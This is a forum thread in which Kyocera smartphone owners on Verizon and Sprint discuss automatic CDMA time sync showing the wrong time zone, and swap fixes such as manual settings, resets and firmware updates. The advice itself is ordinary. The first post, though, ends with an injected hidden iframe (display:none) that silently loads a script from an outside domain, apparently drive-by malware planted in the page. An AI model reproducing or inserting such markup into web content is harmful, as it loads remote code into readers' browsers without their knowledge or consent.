+ Reply to Thread
Page 1 of 3 1 2 3 LastLast
Results 1 to 20 of 43
  1. #1
    glew
    Guest

    Wrong time zone from Automatic CDMA

    I just purchased a new Kyocera QCP 6350 from Verizon Wireless in Portland, Oregon.

    Portland is in the Pacific timezone, PST/PDT.
    PST = GMT-8; PDT = GMT-7.

    However, when I configure Preferences/Set Time: Automatic (yielding "The SmartPhone will now synchronize to CDMA air time...") I get told that I am in GMT-7, MST, Mountain Standard Time.

    Is this just a bug? After all, PDT=GMT-7=MST, except for daylight savings. Is it a bug in the SmartPhone, or is the timezone name, and not just the GMT-XXX, broadcast on CDMA - i.e. is it a bug at Verizon's server? (I have read about such bugs at cable sites on comp.risks.)

    It's easy enough to override the timezone, just annoying.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Randy Tippetts
    Guest
    I have the same exact problem in Utah. Right now when my phone is set to automatic it shows the correct time, but the time zone is Central time. I have to set it to manual to override.

    I have a trouble ticket into Verizon on this but they don't seem to understand the problem. I have been in contact with Kyocera and have found no issues with the phone. Verizon conferenced me with stores in Arizona, Colorado, and Washington. The only one showing the correct time zone is Arizona.

    I know what is causing the problem but can't seem to get Verizon to understand. The time sync signal they are generating also has a function for daylight savings time. This is either not set up, or set up incorrectly on the CDMA network. Arizona is not affected because they don't use daylight savings time.

    Anyway; long story short, my trouble ticket has been active for a month now with no results. Based on all of the information I have acquired in this adventure, I am convinced that the phone will correct itself when we go off of daylight savings time. Maybe they will correct the time sync signal before then but don't count on it.

    I suggest you call Verizon and explain the issue to them. Maybe with more people complaining about it, it will become more of a priority to them.

    Anyone else with this issue? Let us know, and add your voice to ours at Verizon.

  3. #3
    Registered User
    Join Date
    08-26-2003
    Location
    Kansas City
    Posts
    191
    Glew,
    I am on my second 6035 and this bug is in both of them. I live in the Central time zone and although my phone is showing the correct time it says I am at GMT-05:00 Eastern Time, Peru.

    Shwemp

  4. #4
    Registered User
    Join Date
    10-29-2001
    Posts
    94
    I'm on Sprint in Eastern time zone and the phone shows Atlantic - the time in all cases seems right - just a screwed up time zone. Looks like it affects both Verizon and Sprint......
    CB1111

    When in trouble - obfuscate

  5. #5
    Registered User emuller's Avatar
    Join Date
    07-23-2001
    Location
    San Francisco
    Posts
    126
    I'm on Sprint in Eastern Daylight Time, and whenever I do a soft reset, or get my software updated from Sprint, the phone defaults to Atlantic Standard Time. I've found that if you set it to what it should be, manually, and then change it back to automatic, it then gets and maintains the correct setting until the next reset.

    I have traveled to Central Daylight Time with it set on automatic and it changes to the correct setting without any trouble -- regardless of whether is was previously AST or EDT.

    Hope this helps!

  6. #6
    dshay
    Guest
    This is partly a phone issue and partly a tower issue. To consistently get the right time zone, both need to be fixed.

    One of the SW/KZ upgrades fixes the phone. I am at SX 1.0.05 and KZ 1.0.06. In one part of town, I get AST, in another part (with the correct towers) I get EDT.

    Before the upgrade to the firmware, it always showed AST.

    Still will require Verizon/Sprint to fix whatever it is the towers are broadcast.

    David Shay

  7. #7
    Registered User
    Join Date
    09-19-2001
    Posts
    48

    wrong time / timezone when set to automatic

    Hi there. I've a 6035. A friend of mine just got the 7135, and yes, I'm jealous. Now, on to my question.

    The phone he bought is an Alltell branded one (from CA, I guess...), that he's using in CT on Verizon. When he has the phone set to read the time from the network, it pulls back the "correct" time only when it's set to PT. When he sets it to ET, the clock is off by 3 hours.

    Has this happened to anyone else?

    I've found a temporary solution, which is to set the time manually, but I'd prefer to get a better answer.

    Thanks!

    Todd
    !todd erases a red dot!

  8. #8
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Same with mine (GetConnected.com on Verizon). I want it at Central Time on Automatic, but no doing. So yes in auto mine too says Pacific Time.

    At least you know that he is not alone on this one.

    Anyone want to clear this one up?
    ~'kito
    pdaPhoneHome Moderator

  9. #9
    Registered User
    Join Date
    10-23-2002
    Posts
    47
    same with my 6035 i am in NY and it says central time

  10. #10
    Registered User
    Join Date
    01-24-2003
    Location
    Torrance, CA - USA
    Posts
    420
    Sounds like a provider issue. Give your carrier a call and ask what's up!

  11. #11
    CBCP, PMP jsimonson0's Avatar
    Join Date
    08-21-2003
    Location
    Chicago, IL
    Posts
    400
    What service address did you all use? Did you use an address that's in your same time zone? There might be some setting in the phone for time zone...

  12. #12
    Registered User
    Join Date
    02-05-2003
    Posts
    5
    My phone started out the same way. Purchased from get connected.com. Activated on Verizon. Replaced a 6035. Mine was always in eastern time zone on automatic to get correct time (for Pacific time zone)

    However this problem is now solved. I'm set on automatic and I'm in the correct time zone (PST). and my phone displays the correct time (what a concept!)

    I believe it may have been solved by a HARD reset which occured when I changed the battery on my phone. I'm still not clear as to why the Hard reset occured (possibly too slow changing the battery?? seems like a stretch). However after I restored my data from the sd card (using backup buddy vfs) problem was solved.

    NOTE: HARD reset means you WILL LOSE DATA. Proceed at your own risk!!!

    Question: has anyone figured out how to get the time zone to display on the screen (ie: PST) like was possible on the 6035. This was very useful when moving between time zones.

    Regards, Jeff

  13. #13
    Registered User dwdod's Avatar
    Join Date
    07-01-2001
    Location
    Metro Washington D.C. area
    Posts
    2,085
    Originally posted by jstuart
    My phone started out the same way. Purchased from get connected.com. Activated on Verizon. Replaced a 6035. Mine was always in eastern time zone on automatic to get correct time (for Pacific time zone)

    However this problem is now solved. I'm set on automatic and I'm in the correct time zone (PST). and my phone displays the correct time (what a concept!)

    I believe it may have been solved by a HARD reset which occured when I changed the battery on my phone. I'm still not clear as to why the Hard reset occured (possibly too slow changing the battery?? seems like a stretch). However after I restored my data from the sd card (using backup buddy vfs) problem was solved.

    NOTE: HARD reset means you WILL LOSE DATA. Proceed at your own risk!!!

    Question: has anyone figured out how to get the time zone to display on the screen (ie: PST) like was possible on the 6035. This was very useful when moving between time zones.

    Regards, Jeff
    I have to admit to something similar. At first, I had to set mine to Pacific time zone in order to get it to display the correct time (I'm in the Eastern time zone). But then I decided to set it to Eastern time zone and eventually (without any hard resets, but several soft resets) it is now displaying the correct time and is set to the correct time zone.

    My advise... Set your time zone preferences to your correct time zone, even if that causes the time to be incorrect. Then do a soft reset and a hot sync. My experience leads me to bet that following this technique, your time and time zone will synchronize properly.
    Dave

  14. #14
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Dave, I took your advice and changed it to my timezone (Central), then did a soft reset (no need to sync). And it is now correct on automatic!

    Glad we could trade tips today Dave!

    Thanks again,
    ~'kito
    pdaPhoneHome Moderator

  15. #15
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    didnt we have this problem with the 6035's a while back???!!!

  16. #16
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    I think so, but it was soooooo long ago...
    ~'kito
    pdaPhoneHome Moderator

  17. #17
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Mine is on Central time, in central time, with no TZ variances. Are you guys setting the TZ in the preferences and reseting the handset to see if it takes? The TZ settings is merely for display purposes, the clock should be set by the network, regardless of the TZ settign you choose.

  18. #18
    Registered User
    Join Date
    02-03-2003
    Posts
    85
    Mine was the same I'm est and it showed the correct time for me in pst. But i changed it to est anyway and after powering down the phone and back on it was right.

  19. #19
    Registered User skicheer12's Avatar
    Join Date
    10-02-2002
    Location
    Sayreville, NJ
    Posts
    544
    Same thing - I am located in Eastern Time. Phone reads Central, but shows correct actual time.

    I have no clue why
    The one who dies with the most toys WINS :-)

  20. #20
    Registered User
    Join Date
    02-03-2003
    Posts
    85
    go ahead and set it for est and then power off the phone. when it logs back into the server it will be right. or atleast mine was.
    i was 5 hours off but as soon as i got logged back in it change to the correct time.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts